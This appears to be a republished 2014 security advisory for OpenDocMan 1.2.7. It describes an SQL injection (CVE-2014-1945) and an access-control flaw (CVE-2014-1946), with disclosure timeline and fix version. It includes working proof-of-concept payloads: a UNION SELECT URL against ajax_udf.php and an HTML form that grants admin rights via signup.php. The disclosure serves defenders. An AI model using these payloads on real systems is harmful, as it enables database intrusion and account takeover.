Lucene search
High-Tech Bridge1337DAY-ID-21984HistoryMar 05, 2014 - 12:00 a.m.
OpenDocMan 1.2.7 - Multiple Vulnerabilities
2014-03-0500:00:00
High-Tech Bridge
0day.today
614
0.005 Low
EPSS
Percentile
73.2%
OpenDocMan versions 1.2.7 and below suffer from improper access control and remote SQL injection vulnerabilities.
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
1) SQL Injection in OpenDocMan: CVE-2014-1945
The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of the MySQL server:
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
2) Improper Access Control in OpenDocMan: CVE-2014-1946
The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userΓ’??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
The exploitation example below assigns administrative privileges for the current account:
<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
------------------------------------------------------------------------
-----------------------
Solution:
Update to OpenDocMan v1.2.7.2
More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/
# 0day.today [2018-01-10] #Related
openvas
openvas
OpenDocMan 'ajax_udf.php' Multiple SQL Injection Vulnerabilities
2014-03-11 00:00:00
prion
prion
Sql injection
2014-03-09 13:16:00
cvelist
cvelist
CVE-2014-1945
2014-03-07 20:00:00
seebug
seebug
OpenDocMan 'ajax_udf.php'ε€δΈͺSQL注ε
₯ζΌζ΄
2014-02-27 00:00:00
cve
cve
CVE-2014-1945
2014-03-09 13:16:00
htbridge
htbridge
Multiple Vulnerabilities in OpenDocMan
2014-02-12 00:00:00
packetstorm
packetstorm
OpenDocMan 1.2.7 SQL Injection / Access Control
2014-03-06 00:00:00
securityvulns
securityvulns
Multiple Vulnerabilities in OpenDocMan
2014-05-04 00:00:00
exploitpack
exploitpack
OpenDocMan 1.2.7 - Multiple Vulnerabilities
2014-03-05 00:00:00
exploitdb
exploitdb
OpenDocMan 1.2.7 - Multiple Vulnerabilities
2014-03-05 00:00:00